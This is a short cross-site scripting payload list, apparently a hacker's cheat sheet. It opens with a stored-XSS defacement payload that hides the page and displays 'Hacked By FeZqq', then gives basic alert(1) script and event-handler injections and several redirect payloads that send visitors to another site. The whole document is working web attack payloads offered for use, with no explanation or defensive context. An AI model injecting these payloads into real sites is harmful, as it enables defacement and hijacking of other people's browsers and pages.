Destroy Everything For Stored XSS (Use Carefully)
-------------------------------------------------
<style>html::before {content: "Hacked By FeZqq";} body {display: none;}</style>



Basic Payloads For First Step
-------------------------------------------------
<script>alert(1)</script>
<img src=validimage.png onload=alert(1)>
<img srcset=validimage.png onload=alert(1)>
<input onclick="alert(1)" style=display:block>test</input>
<a onmouseover="alert(1)" style=display:block>test</a>



Redirect Payloads
-------------------------------------------------
<script>window.location='https://google.com'</script>
<script>window.location=&quot;https://google.com&quot;</script>
<script>location='https://google.com'</script>
<a href="#" onclick="location='https://google.com'">Click me</a>
<img src=x onerror="location='https://google.com'">


